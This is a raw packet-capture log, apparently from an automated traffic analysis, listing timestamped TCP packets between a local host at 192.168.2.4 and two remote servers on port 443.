Aug 19, 2024 09:28:43.755489111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.755520105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.755542040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.755551100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.755564928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.762645960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.762665033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.762757063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.762779951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.762861013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.762882948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.762913942 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.762922049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.762937069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.785525084 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.785554886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.785636902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.785655975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.841054916 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.847014904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847023964 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847085953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847136974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.847148895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847203970 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.847301006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847317934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847367048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.847374916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847388029 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.847420931 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.847518921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847533941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847588062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.847594976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.847623110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.847642899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.847996950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.848011971 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.848062992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.848068953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.848100901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.848119974 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.848119974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.848131895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.848151922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.848182917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.848205090 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.848208904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.848246098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.849991083 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.855555058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.855578899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.855650902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.855659962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.855693102 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.855881929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.855900049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.855945110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.855951071 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.855973005 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.855988026 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.858092070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.878621101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.878640890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.878710032 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.878726959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.878760099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.940243959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.940267086 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.940366030 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.940457106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.940521955 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.940840960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.940860987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.940927982 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.940946102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.940968990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.940992117 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.941003084 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.941016912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.941032887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.941067934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.941087008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.941102982 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.941148043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.941165924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.941198111 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.941219091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.941498995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.941538095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.941562891 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.941582918 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.941629887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.941629887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.948337078 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.948364019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.948456049 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.948502064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.948605061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.948627949 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.948647022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.948662996 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.948720932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.948719025 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.948755980 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.948767900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.948820114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.948820114 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.949407101 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.971133947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.971151114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.971333027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.971333981 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:43.971358061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:43.971394062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.032855988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.032875061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033119917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.033145905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033159971 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033179045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033207893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.033215046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033233881 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.033262968 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.033339024 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033355951 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033401012 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.033406973 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033432007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.033453941 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.033615112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033632040 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033680916 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.033688068 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033719063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.033947945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033962965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.033994913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.034006119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.034029007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.034044027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.037590981 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.040937901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.040958881 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.040997028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.041003942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.041024923 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.041042089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.041477919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.041495085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.041543007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.041551113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.041585922 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.043389082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.063904047 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.063949108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.063975096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.063986063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.064011097 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.064029932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.125458002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.125489950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.125539064 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.125561953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.125577927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.125579119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.125598907 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.125605106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.125627041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.125647068 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.125679970 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.125685930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.125725031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.126101017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126126051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126177073 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.126185894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126200914 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126215935 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.126223087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126236916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126246929 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.126280069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.126283884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126313925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.126511097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126528978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126566887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.126574993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.126596928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.126611948 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.129764080 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.133554935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.133577108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.133631945 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.133647919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.133671045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.133688927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.134040117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.134063005 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.134097099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.134104967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.134128094 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.134145021 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.136051893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.156558037 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.156579971 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.156806946 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.156837940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.156881094 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.174561977 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:44.174640894 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:44.174691916 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:44.218061924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218086958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218179941 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.218205929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218228102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218249083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218251944 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.218262911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218286991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.218317986 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.218660116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218677044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218722105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.218730927 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218759060 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.218796015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218813896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218839884 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.218846083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.218863964 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.218879938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.219167948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.219192982 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.219219923 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.219228029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.219250917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.219268084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.221581936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.226423025 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.226447105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.226501942 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.226516008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.226552010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.226918936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.226938009 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.226967096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.226974010 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.226998091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.227014065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.227791071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.249082088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.249106884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.249182940 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.249201059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.249335051 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.287903070 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:44.287950993 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:44.287974119 CEST	49760	443	192.168.2.4	188.114.97.3
Aug 19, 2024 09:28:44.287981033 CEST	443	49760	188.114.97.3	192.168.2.4
Aug 19, 2024 09:28:44.310610056 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.310638905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.310677052 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.310695887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.310719967 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.310734987 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.310744047 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.310770035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.310801029 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.310807943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.310831070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.310846090 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.311017036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.311047077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.311074972 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.311080933 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.311105013 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.311120987 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.311352015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.311377048 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.311402082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.311408997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.311429024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.311446905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.311659098 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.311676025 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.311729908 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.311738014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.311806917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.318998098 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.319015980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.319067955 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.319082022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.319102049 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.319118023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.319339991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.319359064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.319394112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.319400072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.319422960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.319437981 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.320568085 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.341801882 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.341821909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.341912031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.341936111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.342071056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.403525114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.403554916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.403603077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.403650045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.403665066 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.403685093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.403712988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.403728962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.403831959 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.403831959 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.403831959 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.403846025 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.404476881 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.404508114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.404541969 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.404551029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.404567003 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.404772997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.404788017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.404818058 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.404824972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.404841900 CEST	49759	443	192.168.2.4	185.149.100.242
